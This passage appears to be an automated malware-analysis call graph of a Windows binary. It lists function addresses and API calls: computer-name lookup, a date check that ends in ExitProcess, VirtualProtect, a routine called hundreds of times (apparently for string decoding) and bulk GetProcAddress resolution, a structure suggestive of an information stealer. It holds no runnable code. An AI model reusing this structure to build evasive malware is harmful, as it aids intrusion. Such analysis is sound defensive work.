1a7a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37784->37785 37786 1a6ce3 37785->37786 37787 1aacc0 37786->37787 38008 1aaa20 37787->38008 37789 1aacd1 lstrlen 37792 1aacf0 37789->37792 37790 1aad28 38009 1aaab0 37790->38009 37792->37790 37794 1aad0a lstrcpy lstrcat 37792->37794 37793 1aad34 37793->37622 37794->37790 37797 1aabcb 37795->37797 37796 1aac1b 37796->37634 37797->37796 37798 1aac09 lstrcpy 37797->37798 37798->37796 38013 1a6ac0 37799->38013 37801 1a6c2e 37802 1a6c38 sscanf 37801->37802 38042 1aab10 37802->38042 37804 1a6c4a SystemTimeToFileTime SystemTimeToFileTime 37805 1a6c6e 37804->37805 37806 1a6c80 37804->37806 37805->37806 37807 1a6c78 ExitProcess 37805->37807 37808 1a5d60 37806->37808 37809 1a5d6d 37808->37809 37810 1aaa50 lstrcpy 37809->37810 37811 1a5d7e 37810->37811 38044 1aab30 lstrlen 37811->38044 37814 1aab30 2 API calls 37815 1a5db4 37814->37815 37816 1aab30 2 API calls 37815->37816 37817 1a5dc4 37816->37817 38048 1a6680 37817->38048 37820 1aab30 2 API calls 37821 1a5de3 37820->37821 37822 1aab30 2 API calls 37821->37822 37823 1a5df0 37822->37823 37824 1aab30 2 API calls 37823->37824 37825 1a5dfd 37824->37825 37826 1aab30 2 API calls 37825->37826 37827 1a5e49 37826->37827 38057 1926f0 37827->38057 37835 1a5f13 37836 1a6680 lstrcpy 37835->37836 37837 1a5f25 37836->37837 37838 1aaab0 lstrcpy 37837->37838 37839 1a5f42 37838->37839 37840 1aacc0 4 API calls 37839->37840 37841 1a5f5a 37840->37841 37842 1aabb0 lstrcpy 37841->37842 37843 1a5f66 37842->37843 37844 1aacc0 4 API calls 37843->37844 37845 1a5f8a 37844->37845 37846 1aabb0 lstrcpy 37845->37846 37847 1a5f96 37846->37847 37848 1aacc0 4 API calls 37847->37848 37849 1a5fba 37848->37849 37850 1aabb0 lstrcpy 37849->37850 37851 1a5fc6 37850->37851 37852 1aaa50 lstrcpy 37851->37852 37853 1a5fee 37852->37853 38783 1a7690 GetWindowsDirectoryA 37853->38783 37856 1aaab0 lstrcpy 37857 1a6008 37856->37857 38793 1948d0 37857->38793 37859 1a600e 38938 1a19f0 37859->38938 37861 1a6016 37862 1aaa50 lstrcpy 37861->37862 37863 1a6039 37862->37863 37864 191590 lstrcpy 37863->37864 37865 1a604d 37864->37865 38954 1959b0 34 API calls codecvt 37865->38954 37867 1a6053 38955 1a1280 lstrlen lstrcpy 37867->38955 37869 1a605e 37870 1aaa50 lstrcpy 37869->37870 37871 1a6082 37870->37871 37872 191590 lstrcpy 37871->37872 37873 1a6096 37872->37873 38956 1959b0 34 API calls codecvt 37873->38956 37875 1a609c 38957 1a0fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37875->38957 37877 1a60a7 37878 1aaa50 lstrcpy 37877->37878 37879 1a60c9 37878->37879 37880 191590 lstrcpy 37879->37880 37881 1a60dd 37880->37881 38958 1959b0 34 API calls codecvt 37881->38958 37883 1a60e3 38959 1a1170 StrCmpCA lstrlen lstrcpy 37883->38959 37885 1a60ee 37886 191590 lstrcpy 37885->37886 37887 1a6105 37886->37887 38960 1a1c60 115 API calls 37887->38960 37889 1a610a 37890 1aaa50 lstrcpy 37889->37890 37891 1a6126 37890->37891 38961 195000 7 API calls 37891->38961 37893 1a612b 37894 191590 lstrcpy 37893->37894 37895 1a61ab 37894->37895 38962 1a08a0 285 API calls 37895->38962 37897 1a61b0 37898 1aaa50 lstrcpy 37897->37898 37899 1a61d6 37898->37899 37900 191590 lstrcpy 37899->37900 37901 1a61ea 37900->37901 38963 1959b0 34 API calls codecvt 37901->38963 37903 1a61f0 38964 1a13c0 StrCmpCA lstrlen lstrcpy 37903->38964 37905 1a61fb 37906 191590 lstrcpy 37905->37906 37907 1a623b 37906->37907 38965 191ec0 59 API calls 37907->38965 37909 1a6240 37910 1a62e2 37909->37910 37911 1a6250 37909->37911 37912 1aaab0 lstrcpy 37910->37912 37913 1aaa50 lstrcpy 37911->37913 37914 1a62f5 37912->37914 37915 1a6270 37913->37915 37916 191590 lstrcpy 37914->37916 37917 191590 lstrcpy 37915->37917 37918 1a6309 37916->37918 37919 1a6284 37917->37919 38969 1959b0 34 API calls codecvt 37918->38969 38966 1959b0 34 API calls codecvt 37919->38966 37922 1a630f 38970 1a37b0 31 API calls 37922->38970 37923 1a628a 38967 1a1520 19 API calls codecvt 37923->38967 37926 1a62da 37930 1a635b 37926->37930 37933 191590 lstrcpy 37926->37933 37927 1a6295 37928 191590 lstrcpy 37927->37928 37929 1a62d5 37928->37929 38968 1a4010 67 API calls 37929->38968 37932 1a6380 37930->37932 37934 191590 lstrcpy 37930->37934 37935 1a63a5 37932->37935 37940 191590 lstrcpy 37932->37940 37936 1a6337 37933->37936 37939 1a637b 37934->37939 37938 1a63ca 37935->37938 37942 191590 lstrcpy 37935->37942 38971 1a4300 57 API calls 2 library calls 37936->38971 37943 1a63ef 37938->37943 37949 191590 lstrcpy 37938->37949 38973 1a49d0 88 API calls codecvt 37939->38973 37945 1a63a0 37940->37945 37941 1a633c 37947 191590 lstrcpy 37941->37947 37948 1a63c5 37942->37948 37950 1a6414 37943->37950 37951 191590 lstrcpy 37943->37951 38974 1a4e00 61 API calls codecvt 37945->38974 37952 1a6356 37947->37952 38975 1a4fc0 65 API calls 37948->38975 37955 1a63ea 37949->37955 37953 1a6439 37950->37953 37958 191590 lstrcpy 37950->37958 37956 1a640f 37951->37956 38972 1a5350 44 API calls 37952->38972 37959 1a6460 37953->37959 37965 191590 lstrcpy 37953->37965 38976 1a5190 63 API calls codecvt 37955->38976 38977 197770 107 API calls codecvt 37956->38977 37964 1a6434 37958->37964 37961 1a6503 37959->37961 37962 1a6470 37959->37962 37969 1aaab0 lstrcpy 37961->37969 37966 1aaa50 lstrcpy 37962->37966 38978 1a52a0 61 API calls codecvt 37964->38978 37968 1a6459 37965->37968 37971 1a6491 37966->37971 38979 1a91a0 46 API calls codecvt 37968->38979 37970 1a6516 37969->37970 37973 191590 lstrcpy 37970->37973 37974 191590 lstrcpy 37971->37974 37975 1a652a 37973->37975 37976 1a64a5 37974->37976 38983 1959b0 34 API calls codecvt 37975->38983 38980 1959b0 34 API calls codecvt 37976->38980 37979 1a6530 38984 1a37b0 31 API calls 37979->38984 37980 1a64ab 38981 1a1520 19 API calls codecvt 37980->38981 37983 1a64fb 37986 1aaab0 lstrcpy 37983->37986 37984 1a64b6 37985 191590 lstrcpy 37984->37985 37987 1a64f6 37985->37987 37988 1a654c 37986->37988 38982 1a4010 67 API calls 37987->38982 37990 191590 lstrcpy 37988->37990 37991 1a6560 37990->37991 38985 1959b0 34 API calls codecvt 37991->38985 37993 1a6588 37993->37640 37994 1a656c 37994->37993 38986 1a68d0 9 API calls codecvt 37994->38986 37997 194621 RtlAllocateHeap 37996->37997 37999 194671 VirtualProtect 37997->37999 37999->37645 38001->37732 38004 1910c2 codecvt 38002->38004 38003 1910fd 38003->37762 38004->38003 38005 1910e2 VirtualFree 38004->38005 38005->38003 38007 191233 GlobalMemoryStatusEx 38006->38007 38007->37765 38008->37789 38011 1aaad2 38009->38011 38010 1aaafc 38010->37793 38011->38010 38012 1aaaea lstrcpy 38011->38012 38012->38010 38014 1aaa50 lstrcpy 38013->38014 38015 1a6ad3 38014->38015 38016 1aacc0 4 API calls 38015->38016 38017 1a6ae5 38016->38017 38018 1aabb0 lstrcpy 38017->38018 38019 1a6aee 38018->38019 38020 1aacc0 4 API calls 38019->38020 38021 1a6b07 38020->38021 38022 1aabb0 lstrcpy 38021->38022 38023 1a6b10 38022->38023 38024 1aacc0 4 API calls 38023->38024 38025 1a6b2a 38024->38025 38026 1aabb0 lstrcpy 38025->38026 38027 1a6b33 38026->38027 38028 1aacc0 4 API calls 38027->38028 38029 1a6b4c 38028->38029 38030 1aabb0 lstrcpy 38029->38030 38031 1a6b55 38030->38031 38032 1aacc0 4 API calls 38031->38032 38033 1a6b6f 38032->38033 38034 1aabb0 lstrcpy 38033->38034 38035 1a6b78 38034->38035 38036 1aacc0 4 API calls 38035->38036 38037 1a6b93 38036->38037 38038 1aabb0 lstrcpy 38037->38038 38039 1a6b9c 38038->38039 38040 1aaab0 lstrcpy 38039->38040 38041 1a6bb0 38040->38041 38041->37801 38043 1aab22 38042->38043 38043->37804 38046 1aab4f 38044->38046 38045 1a5da4 38045->37814 38046->38045 38047 1aab8b lstrcpy 38046->38047 38047->38045 38049 1aabb0 lstrcpy 38048->38049 38050 1a6693 38049->38050 38051 1aabb0 lstrcpy 38050->38051 38052 1a66a5 38051->38052 38053 1aabb0 lstrcpy 38052->38053 38054 1a66b7 38053->38054 38055 1aabb0 lstrcpy 38054->38055 38056 1a5dd6 38055->38056 38056->37820 38058 194610 2 API calls 38057->38058 38059 192704 38058->38059 38060 194610 2 API calls 38059->38060 38061 192727 38060->38061 38062 194610 2 API calls 38061->38062 38063 192740 38062->38063 38064 194610 2 API calls 38063->38064 38065 192759 38064->38065 38066 194610 2 API calls 38065->38066 38067 192786 38066->38067 38068 194610 2 API calls 38067->38068 38069 19279f 38068->38069 38070 194610 2 API calls 38069->38070 38071 1927b8 38070->38071 38072 194610 2 API calls 38071->38072 38073 1927e5 38072->38073 38074 194610 2 API calls 38073->38074 38075 1927fe 38074->38075 38076 194610 2 API calls 38075->38076 38077 192817 38076->38077 38078 194610 2 API calls 38077->38078 38079 192830 38078->38079 38080 194610 2 API calls 38079->38080 38081 192849 38080->38081 38082 194610 2 API calls 38081->38082 38083 192862 38082->38083 38084 194610 2 API calls 38083->38084 38085 19287b 38084->38085 38086 194610 2 API calls 38085->38086 38087 192894 38086->38087 38088 194610 2 API calls 38087->38088 38089 1928ad 38088->38089 38090 194610 2 API calls 38089->38090 38091 1928c6 38090->38091 38092 194610 2 API calls 38091->38092 38093 1928df 38092->38093 38094 194610 2 API calls 38093->38094 38095 1928f8 38094->38095 38096 194610 2 API calls 38095->38096 38097 192911 38096->38097 38098 194610 2 API calls 38097->38098 38099 19292a 38098->38099 38100 194610 2 API calls 38099->38100 38101 192943 38100->38101 38102 194610 2 API calls 38101->38102 38103 19295c 38102->38103 38104 194610 2 API calls 38103->38104 38105 192975 38104->38105 38106 194610 2 API calls 38105->38106 38107 19298e 38106->38107 38108 194610 2 API calls 38107->38108 38109 1929a7 38108->38109 38110 194610 2 API calls 38109->38110 38111 1929c0 38110->38111 38112 194610 2 API calls 38111->38112 38113 1929d9 38112->38113 38114 194610 2 API calls 38113->38114 38115 1929f2 38114->38115 38116 194610 2 API calls 38115->38116 38117 192a0b 38116->38117 38118 194610 2 API calls 38117->38118 38119 192a24 38118->38119 38120 194610 2 API calls 38119->38120 38121 192a3d 38120->38121 38122 194610 2 API calls 38121->38122 38123 192a56 38122->38123 38124 194610 2 API calls 38123->38124 38125 192a6f 38124->38125 38126 194610 2 API calls 38125->38126 38127 192a88 38126->38127 38128 194610 2 API calls 38127->38128 38129 192aa1 38128->38129 38130 194610 2 API calls 38129->38130 38131 192aba 38130->38131 38132 194610 2 API calls 38131->38132 38133 192ad3 38132->38133 38134 194610 2 API calls 38133->38134 38135 192aec 38134->38135 38136 194610 2 API calls 38135->38136 38137 192b05 38136->38137 38138 194610 2 API calls 38137->38138 38139 192b1e 38138->38139 38140 194610 2 API calls 38139->38140 38141 192b37 38140->38141 38142 194610 2 API calls 38141->38142 38143 192b50 38142->38143 38144 194610 2 API calls 38143->38144 38145 192b69 38144->38145 38146 194610 2 API calls 38145->38146 38147 192b82 38146->38147 38148 194610 2 API calls 38147->38148 38149 192b9b 38148->38149 38150 194610 2 API calls 38149->38150 38151 192bb4 38150->38151 38152 194610 2 API calls 38151->38152 38153 192bcd 38152->38153 38154 194610 2 API calls 38153->38154 38155 192be6 38154->38155 38156 194610 2 API calls 38155->38156 38157 192bff 38156->38157 38158 194610 2 API calls 38157->38158 38159 192c18 38158->38159 38160 194610 2 API calls 38159->38160 38161 192c31 38160->38161 38162 194610 2 API calls 38161->38162 38163 192c4a 38162->38163 38164 194610 2 API calls 38163->38164 38165 192c63 38164->38165 38166 194610 2 API calls 38165->38166 38167 192c7c 38166->38167 38168 194610 2 API calls 38167->38168 38169 192c95 38168->38169 38170 194610 2 API calls 38169->38170 38171 192cae 38170->38171 38172 194610 2 API calls 38171->38172 38173 192cc7 38172->38173 38174 194610 2 API calls 38173->38174 38175 192ce0 38174->38175 38176 194610 2 API calls 38175->38176 38177 192cf9 38176->38177 38178 194610 2 API calls 38177->38178 38179 192d12 38178->38179 38180 194610 2 API calls 38179->38180 38181 192d2b 38180->38181 38182 194610 2 API calls 38181->38182 38183 192d44 38182->38183 38184 194610 2 API calls 38183->38184 38185 192d5d 38184->38185 38186 194610 2 API calls 38185->38186 38187 192d76 38186->38187 38188 194610 2 API calls 38187->38188 38189 192d8f 38188->38189 38190 194610 2 API calls 38189->38190 38191 192da8 38190->38191 38192 194610 2 API calls 38191->38192 38193 192dc1 38192->38193 38194 194610 2 API calls 38193->38194 38195 192dda 38194->38195 38196 194610 2 API calls 38195->38196 38197 192df3 38196->38197 38198 194610 2 API calls 38197->38198 38199 192e0c 38198->38199 38200 194610 2 API calls 38199->38200 38201 192e25 38200->38201 38202 194610 2 API calls 38201->38202 38203 192e3e 38202->38203 38204 194610 2 API calls 38203->38204 38205 192e57 38204->38205 38206 194610 2 API calls 38205->38206 38207 192e70 38206->38207 38208 194610 2 API calls 38207->38208 38209 192e89 38208->38209 38210 194610 2 API calls 38209->38210 38211 192ea2 38210->38211 38212 194610 2 API calls 38211->38212 38213 192ebb 38212->38213 38214 194610 2 API calls 38213->38214 38215 192ed4 38214->38215 38216 194610 2 API calls 38215->38216 38217 192eed 38216->38217 38218 194610 2 API calls 38217->38218 38219 192f06 38218->38219 38220 194610 2 API calls 38219->38220 38221 192f1f 38220->38221 38222 194610 2 API calls 38221->38222 38223 192f38 38222->38223 38224 194610 2 API calls 38223->38224 38225 192f51 38224->38225 38226 194610 2 API calls 38225->38226 38227 192f6a 38226->38227 38228 194610 2 API calls 38227->38228 38229 192f83 38228->38229 38230 194610 2 API calls 38229->38230 38231 192f9c 38230->38231 38232 194610 2 API calls 38231->38232 38233 192fb5 38232->38233 38234 194610 2 API calls 38233->38234 38235 192fce 38234->38235 38236 194610 2 API calls 38235->38236 38237 192fe7 38236->38237 38238 194610 2 API calls 38237->38238 38239 193000 38238->38239 38240 194610 2 API calls 38239->38240 38241 193019 38240->38241 38242 194610 2 API calls 38241->38242 38243 193032 38242->38243 38244 194610 2 API calls 38243->38244 38245 19304b 38244->38245 38246 194610 2 API calls 38245->38246 38247 193064 38246->38247 38248 194610 2 API calls 38247->38248 38249 19307d 38248->38249 38250 194610 2 API calls 38249->38250 38251 193096 38250->38251 38252 194610 2 API calls 38251->38252 38253 1930af 38252->38253 38254 194610 2 API calls 38253->38254 38255 1930c8 38254->38255 38256 194610 2 API calls 38255->38256 38257 1930e1 38256->38257 38258 194610 2 API calls 38257->38258 38259 1930fa 38258->38259 38260 194610 2 API calls 38259->38260 38261 193113 38260->38261 38262 194610 2 API calls 38261->38262 38263 19312c 38262->38263 38264 194610 2 API calls 38263->38264 38265 193145 38264->38265 38266 194610 2 API calls 38265->38266 38267 19315e 38266->38267 38268 194610 2 API calls 38267->38268 38269 193177 38268->38269 38270 194610 2 API calls 38269->38270 38271 193190 38270->38271 38272 194610 2 API calls 38271->38272 38273 1931a9 38272->38273 38274 194610 2 API calls 38273->38274 38275 1931c2 38274->38275 38276 194610 2 API calls 38275->38276 38277 1931db 38276->38277 38278 194610 2 API calls 38277->38278 38279 1931f4 38278->38279 38280 194610 2 API calls 38279->38280 38281 19320d 38280->38281 38282 194610 2 API calls 38281->38282 38283 193226 38282->38283 38284 194610 2 API calls 38283->38284 38285 19323f 38284->38285 38286 194610 2 API calls 38285->38286 38287 193258 38286->38287 38288 194610 2 API calls 38287->38288 38289 193271 38288->38289 38290 194610 2 API calls 38289->38290 38291 19328a 38290->38291 38292 194610 2 API calls 38291->38292 38293 1932a3 38292->38293 38294 194610 2 API calls 38293->38294 38295 1932bc 38294->38295 38296 194610 2 API calls 38295->38296 38297 1932d5 38296->38297 38298 194610 2 API calls 38297->38298 38299 1932ee 38298->38299 38300 194610 2 API calls 38299->38300 38301 193307 38300->38301 38302 194610 2 API calls 38301->38302 38303 193320 38302->38303 38304 194610 2 API calls 38303->38304 38305 193339 38304->38305 38306 194610 2 API calls 38305->38306 38307 193352 38306->38307 38308 194610 2 API calls 38307->38308 38309 19336b 38308->38309 38310 194610 2 API calls 38309->38310 38311 193384 38310->38311 38312 194610 2 API calls 38311->38312 38313 19339d 38312->38313 38314 194610 2 API calls 38313->38314 38315 1933b6 38314->38315 38316 194610 2 API calls 38315->38316 38317 1933cf 38316->38317 38318 194610 2 API calls 38317->38318 38319 1933e8 38318->38319 38320 194610 2 API calls 38319->38320 38321 193401 38320->38321 38322 194610 2 API calls 38321->38322 38323 19341a 38322->38323 38324 194610 2 API calls 38323->38324 38325 193433 38324->38325 38326 194610 2 API calls 38325->38326 38327 19344c 38326->38327 38328 194610 2 API calls 38327->38328 38329 193465 38328->38329 38330 194610 2 API calls 38329->38330 38331 19347e 38330->38331 38332 194610 2 API calls 38331->38332 38333 193497 38332->38333 38334 194610 2 API calls 38333->38334 38335 1934b0 38334->38335 38336 194610 2 API calls 38335->38336 38337 1934c9 38336->38337 38338 194610 2 API calls 38337->38338 38339 1934e2 38338->38339 38340 194610 2 API calls 38339->38340 38341 1934fb 38340->38341 38342 194610 2 API calls 38341->38342 38343 193514 38342->38343 38344 194610 2 API calls 38343->38344 38345 19352d 38344->38345 38346 194610 2 API calls 38345->38346 38347 193546 38346->38347 38348 194610 2 API calls 38347->38348 38349 19355f 38348->38349 38350 194610 2 API calls 38349->38350 38351 193578 38350->38351 38352 194610 2 API calls 38351->38352 38353 193591 38352->38353 38354 194610 2 API calls 38353->38354 38355 1935aa 38354->38355 38356 194610 2 API calls 38355->38356 38357 1935c3 38356->38357 38358 194610 2 API calls 38357->38358 38359 1935dc 38358->38359 38360 194610 2 API calls 38359->38360 38361 1935f5 38360->38361 38362 194610 2 API calls 38361->38362 38363 19360e 38362->38363 38364 194610 2 API calls 38363->38364 38365 193627 38364->38365 38366 194610 2 API calls 38365->38366 38367 193640 38366->38367 38368 194610 2 API calls 38367->38368 38369 193659 38368->38369 38370 194610 2 API calls 38369->38370 38371 193672 38370->38371 38372 194610 2 API calls 38371->38372 38373 19368b 38372->38373 38374 194610 2 API calls 38373->38374 38375 1936a4 38374->38375 38376 194610 2 API calls 38375->38376 38377 1936bd 38376->38377 38378 194610 2 API calls 38377->38378 38379 1936d6 38378->38379 38380 194610 2 API calls 38379->38380 38381 1936ef 38380->38381 38382 194610 2 API calls 38381->38382 38383 193708 38382->38383 38384 194610 2 API calls 38383->38384 38385 193721 38384->38385 38386 194610 2 API calls 38385->38386 38387 19373a 38386->38387 38388 194610 2 API calls 38387->38388 38389 193753 38388->38389 38390 194610 2 API calls 38389->38390 38391 19376c 38390->38391 38392 194610 2 API calls 38391->38392 38393 193785 38392->38393 38394 194610 2 API calls 38393->38394 38395 19379e 38394->38395 38396 194610 2 API calls 38395->38396 38397 1937b7 38396->38397 38398 194610 2 API calls 38397->38398 38399 1937d0 38398->38399 38400 194610 2 API calls 38399->38400 38401 1937e9 38400->38401 38402 194610 2 API calls 38401->38402 38403 193802 38402->38403 38404 194610 2 API calls 38403->38404 38405 19381b 38404->38405 38406 194610 2 API calls 38405->38406 38407 193834 38406->38407 38408 194610 2 API calls 38407->38408 38409 19384d 38408->38409 38410 194610 2 API calls 38409->38410 38411 193866 38410->38411 38412 194610 2 API calls 38411->38412 38413 19387f 38412->38413 38414 194610 2 API calls 38413->38414 38415 193898 38414->38415 38416 194610 2 API calls 38415->38416 38417 1938b1 38416->38417 38418 194610 2 API calls 38417->38418 38419 1938ca 38418->38419 38420 194610 2 API calls 38419->38420 38421 1938e3 38420->38421 38422 194610 2 API calls 38421->38422 38423 1938fc 38422->38423 38424 194610 2 API calls 38423->38424 38425 193915 38424->38425 38426 194610 2 API calls 38425->38426 38427 19392e 38426->38427 38428 194610 2 API calls 38427->38428 38429 193947 38428->38429 38430 194610 2 API calls 38429->38430 38431 193960 38430->38431 38432 194610 2 API calls 38431->38432 38433 193979 38432->38433 38434 194610 2 API calls 38433->38434 38435 193992 38434->38435 38436 194610 2 API calls 38435->38436 38437 1939ab 38436->38437 38438 194610 2 API calls 38437->38438 38439 1939c4 38438->38439 38440 194610 2 API calls 38439->38440 38441 1939dd 38440->38441 38442 194610 2 API calls 38441->38442 38443 1939f6 38442->38443 38444 194610 2 API calls 38443->38444 38445 193a0f 38444->38445 38446 194610 2 API calls 38445->38446 38447 193a28 38446->38447 38448 194610 2 API calls 38447->38448 38449 193a41 38448->38449 38450 194610 2 API calls 38449->38450 38451 193a5a 38450->38451 38452 194610 2 API calls 38451->38452 38453 193a73 38452->38453 38454 194610 2 API calls 38453->38454 38455 193a8c 38454->38455 38456 194610 2 API calls 38455->38456 38457 193aa5 38456->38457 38458 194610 2 API calls 38457->38458 38459 193abe 38458->38459 38460 194610 2 API calls 38459->38460 38461 193ad7 38460->38461 38462 194610 2 API calls 38461->38462 38463 193af0 38462->38463 38464 194610 2 API calls 38463->38464 38465 193b09 38464->38465 38466 194610 2 API calls 38465->38466 38467 193b22 38466->38467 38468 194610 2 API calls 38467->38468 38469 193b3b 38468->38469 38470 194610 2 API calls 38469->38470 38471 193b54 38470->38471 38472 194610 2 API calls 38471->38472 38473 193b6d 38472->38473 38474 194610 2 API calls 38473->38474 38475 193b86 38474->38475 38476 194610 2 API calls 38475->38476 38477 193b9f 38476->38477 38478 194610 2 API calls 38477->38478 38479 193bb8 38478->38479 38480 194610 2 API calls 38479->38480 38481 193bd1 38480->38481 38482 194610 2 API calls 38481->38482 38483 193bea 38482->38483 38484 194610 2 API calls 38483->38484 38485 193c03 38484->38485 38486 194610 2 API calls 38485->38486 38487 193c1c 38486->38487 38488 194610 2 API calls 38487->38488 38489 193c35 38488->38489 38490 194610 2 API calls 38489->38490 38491 193c4e 38490->38491 38492 194610 2 API calls 38491->38492 38493 193c67 38492->38493 38494 194610 2 API calls 38493->38494 38495 193c80 38494->38495 38496 194610 2 API calls 38495->38496 38497 193c99 38496->38497 38498 194610 2 API calls 38497->38498 38499 193cb2 38498->38499 38500 194610 2 API calls 38499->38500 38501 193ccb 38500->38501 38502 194610 2 API calls 38501->38502 38503 193ce4 38502->38503 38504 194610 2 API calls 38503->38504 38505 193cfd 38504->38505 38506 194610 2 API calls 38505->38506 38507 193d16 38506->38507 38508 194610 2 API calls 38507->38508 38509 193d2f 38508->38509 38510 194610 2 API calls 38509->38510 38511 193d48 38510->38511 38512 194610 2 API calls 38511->38512 38513 193d61 38512->38513 38514 194610 2 API calls 38513->38514 38515 193d7a 38514->38515 38516 194610 2 API calls 38515->38516 38517 193d93 38516->38517 38518 194610 2 API calls 38517->38518 38519 193dac 38518->38519 38520 194610 2 API calls 38519->38520 38521 193dc5 38520->38521 38522 194610 2 API calls 38521->38522 38523 193dde 38522->38523 38524 194610 2 API calls 38523->38524 38525 193df7 38524->38525 38526 194610 2 API calls 38525->38526 38527 193e10 38526->38527 38528 194610 2 API calls 38527->38528 38529 193e29 38528->38529 38530 194610 2 API calls 38529->38530 38531 193e42 38530->38531 38532 194610 2 API calls 38531->38532 38533 193e5b 38532->38533 38534 194610 2 API calls 38533->38534 38535 193e74 38534->38535 38536 194610 2 API calls 38535->38536 38537 193e8d 38536->38537 38538 194610 2 API calls 38537->38538 38539 193ea6 38538->38539 38540 194610 2 API calls 38539->38540 38541 193ebf 38540->38541 38542 194610 2 API calls 38541->38542 38543 193ed8 38542->38543 38544 194610 2 API calls 38543->38544 38545 193ef1 38544->38545 38546 194610 2 API calls 38545->38546 38547 193f0a 38546->38547 38548 194610 2 API calls 38547->38548 38549 193f23 38548->38549 38550 194610 2 API calls 38549->38550 38551 193f3c 38550->38551 38552 194610 2 API calls 38551->38552 38553 193f55 38552->38553 38554 194610 2 API calls 38553->38554 38555 193f6e 38554->38555 38556 194610 2 API calls 38555->38556 38557 193f87 38556->38557 38558 194610 2 API calls 38557->38558 38559 193fa0 38558->38559 38560 194610 2 API calls 38559->38560 38561 193fb9 38560->38561 38562 194610 2 API calls 38561->38562 38563 193fd2 38562->38563 38564 194610 2 API calls 38563->38564 38565 193feb 38564->38565 38566 194610 2 API calls 38565->38566 38567 194004 38566->38567 38568 194610 2 API calls 38567->38568 38569 19401d 38568->38569 38570 194610 2 API calls 38569->38570 38571 194036 38570->38571 38572 194610 2 API calls 38571->38572 38573 19404f 38572->38573 38574 194610 2 API calls 38573->38574 38575 194068 38574->38575 38576 194610 2 API calls 38575->38576 38577 194081 38576->38577 38578 194610 2 API calls 38577->38578 38579 19409a 38578->38579 38580 194610 2 API calls 38579->38580 38581 1940b3 38580->38581 38582 194610 2 API calls 38581->38582 38583 1940cc 38582->38583 38584 194610 2 API calls 38583->38584 38585 1940e5 38584->38585 38586 194610 2 API calls 38585->38586 38587 1940fe 38586->38587 38588 194610 2 API calls 38587->38588 38589 194117 38588->38589 38590 194610 2 API calls 38589->38590 38591 194130 38590->38591 38592 194610 2 API calls 38591->38592 38593 194149 38592->38593 38594 194610 2 API calls 38593->38594 38595 194162 38594->38595 38596 194610 2 API calls 38595->38596 38597 19417b 38596->38597 38598 194610 2 API calls 38597->38598 38599 194194 38598->38599 38600 194610 2 API calls 38599->38600 38601 1941ad 38600->38601 38602 194610 2 API calls 38601->38602 38603 1941c6 38602->38603 38604 194610 2 API calls 38603->38604 38605 1941df 38604->38605 38606 194610 2 API calls 38605->38606 38607 1941f8 38606->38607 38608 194610 2 API calls 38607->38608 38609 194211 38608->38609 38610 194610 2 API calls 38609->38610 38611 19422a 38610->38611 38612 194610 2 API calls 38611->38612 38613 194243 38612->38613 38614 194610 2 API calls 38613->38614 38615 19425c 38614->38615 38616 194610 2 API calls 38615->38616 38617 194275 38616->38617 38618 194610 2 API calls 38617->38618 38619 19428e 38618->38619 38620 194610 2 API calls 38619->38620 38621 1942a7 38620->38621 38622 194610 2 API calls 38621->38622 38623 1942c0 38622->38623 38624 194610 2 API calls 38623->38624 38625 1942d9 38624->38625 38626 194610 2 API calls 38625->38626 38627 1942f2 38626->38627 38628 194610 2 API calls 38627->38628 38629 19430b 38628->38629 38630 194610 2 API calls 38629->38630 38631 194324 38630->38631 38632 194610 2 API calls 38631->38632 38633 19433d 38632->38633 38634 194610 2 API calls 38633->38634 38635 194356 38634->38635 38636 194610 2 API calls 38635->38636 38637 19436f 38636->38637 38638 194610 2 API calls 38637->38638 38639 194388 38638->38639 38640 194610 2 API calls 38639->38640 38641 1943a1 38640->38641 38642 194610 2 API calls 38641->38642 38643 1943ba 38642->38643 38644 194610 2 API calls 38643->38644 38645 1943d3 38644->38645 38646 194610 2 API calls 38645->38646 38647 1943ec 38646->38647 38648 194610 2 API calls 38647->38648 38649 194405 38648->38649 38650 194610 2 API calls 38649->38650 38651 19441e 38650->38651 38652 194610 2 API calls 38651->38652 38653 194437 38652->38653 38654 194610 2 API calls 38653->38654 38655 194450 38654->38655 38656 194610 2 API calls 38655->38656 38657 194469 38656->38657 38658 194610 2 API calls 38657->38658 38659 194482 38658->38659 38660 194610 2 API calls 38659->38660 38661 19449b 38660->38661 38662 194610 2 API calls 38661->38662 38663 1944b4 38662->38663 38664 194610 2 API calls 38663->38664 38665 1944cd 38664->38665 38666 194610 2 API calls 38665->38666 38667 1944e6 38666->38667 38668 194610 2 API calls 38667->38668 38669 1944ff 38668->38669 38670 194610 2 API calls 38669->38670 38671 194518 38670->38671 38672 194610 2 API calls 38671->38672 38673 194531 38672->38673 38674 194610 2 API calls 38673->38674 38675 19454a 38674->38675 38676 194610 2 API calls 38675->38676 38677 194563 38676->38677 38678 194610 2 API calls 38677->38678 38679 19457c 38678->38679 38680 194610 2 API calls 38679->38680 38681 194595 38680->38681 38682 194610 2 API calls 38681->38682 38683 1945ae 38682->38683 38684 194610 2 API calls 38683->38684 38685 1945c7 38684->38685 38686 194610 2 API calls 38685->38686 38687 1945e0 38686->38687 38688 194610 2 API calls 38687->38688 38689 1945f9 38688->38689 38690 1a9f20 38689->38690 38691 1a9f30 43 API calls 38690->38691 38692 1aa346 8 API calls 38690->38692 38691->38692 38693 1aa3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38692->38693 38694 1aa456 38692->38694 38693->38694 38695 1aa463 8 API calls 38694->38695 38696 1aa526 38694->38696 38695->38696 38697 1aa5a8 38696->38697 38698 1aa52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38696->38698 38699 1aa647 38697->38699 38700 1aa5b5 6 API calls 38697->38700 38698->38697 38701 1aa72f 38699->38701 38702 1aa654 9 API calls 38699->38702 38700->38699 38703 1aa738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38701->38703 38704 1aa7b2 38701->38704 38702->38701 38703->38704 38705 1aa7bb GetProcAddress GetProcAddress 38704->38705 38706 1aa7ec 38704->38706 38705->38706 38707 1aa825 38706->38707 38708 1aa7f5 GetProcAddress GetProcAddress 38706->38708 38709 1aa922 38707->38709 38710 1aa832 10 API calls 38707->38710 38708->38707 38711 1aa92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38709->38711 38712 1aa98d 38709->38712 38710->38709 38711->38712 38713 1aa9ae 38712->38713 38714 1aa996 GetProcAddress 38712->38714 38715 1a5ef3 38713->38715 38716 1aa9b7 GetProcAddress GetProcAddress 